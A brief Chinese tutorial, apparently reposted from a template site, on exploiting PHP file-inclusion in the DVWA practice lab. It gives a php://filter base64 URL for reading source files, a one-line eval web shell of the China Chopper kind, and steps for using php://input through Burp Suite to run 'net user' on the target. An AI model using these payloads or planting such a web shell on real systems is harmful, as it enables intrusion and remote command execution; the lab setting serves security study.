读文件
php://filter/read=convert.base64-encode/是编码
http://192.168.246.11/DVWA/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php
<?php @eval($_POST['chopper']);?>
利用包含漏洞所在点,进行读文件,bp抓包后能看到文件的内容
将抓包读取到的文件内容解密
写文件
执行netuser命令在bp抓包里面写,构造一个语句php://input
抓包里面写自己要获得的数据发送就能看到目标主机的相关信息
注意:
allow _url_include为on的时候才可以使用,
如果想查看回显结果那必须在php-apache.ini查找文章来源:https://www.toymoban.com/news/detail-731788.html
display_funtions=proc-open,oppen,exec,system…….删掉system重启apache文章来源地址https://www.toymoban.com/news/detail-731788.html
到了这里,关于PHP包含读文件写文件的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!